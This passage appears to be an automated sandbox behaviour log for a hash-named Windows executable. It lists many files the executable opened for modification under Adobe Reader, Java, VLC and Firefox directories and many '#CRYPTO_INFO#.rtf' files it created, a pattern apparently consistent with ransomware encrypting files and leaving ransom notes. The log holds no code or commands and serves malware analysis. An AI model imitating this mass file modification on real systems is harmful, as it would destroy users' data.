8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left-pressed.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-sl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\example_icons2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_editpdf_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-up-pressed.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\checkmark-2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-ui.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\THANKS.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.sat4j.core_2.3.5.v201308161310.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\main-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaTypewriterBold.ttf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\jquery.jstree.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\ssvagent.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\virgo-new-folder.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluNoSearchResults_180x160.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\startNetworkServer.bat 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\win32_CopyNoDrop32x32.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-no-text.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\dt.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\icons_ie8.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\new_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_ie8.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons_ie8.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\hijrah-config-umalqura.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\uninstall.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\duplicate.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\cstm_brand_preview2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\LightTheme.acrotheme 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Update\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Mozilla Firefox\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\css\main-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-charts.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-en_us_2x.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\en-us\PlayStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-execution.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyclient.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\jp2launcher.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\eclipse.inf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\jfxrt.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer_3.2.200.v20140827-1444.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\s_empty_folder_state.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\license.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\jfr\default.jfc 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_reject_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\chrome-ext.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\javafx-src.zip 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\illustrations.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\reduced_mode-2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\blacklist 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_blu.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\classlist 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Light.pdf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader 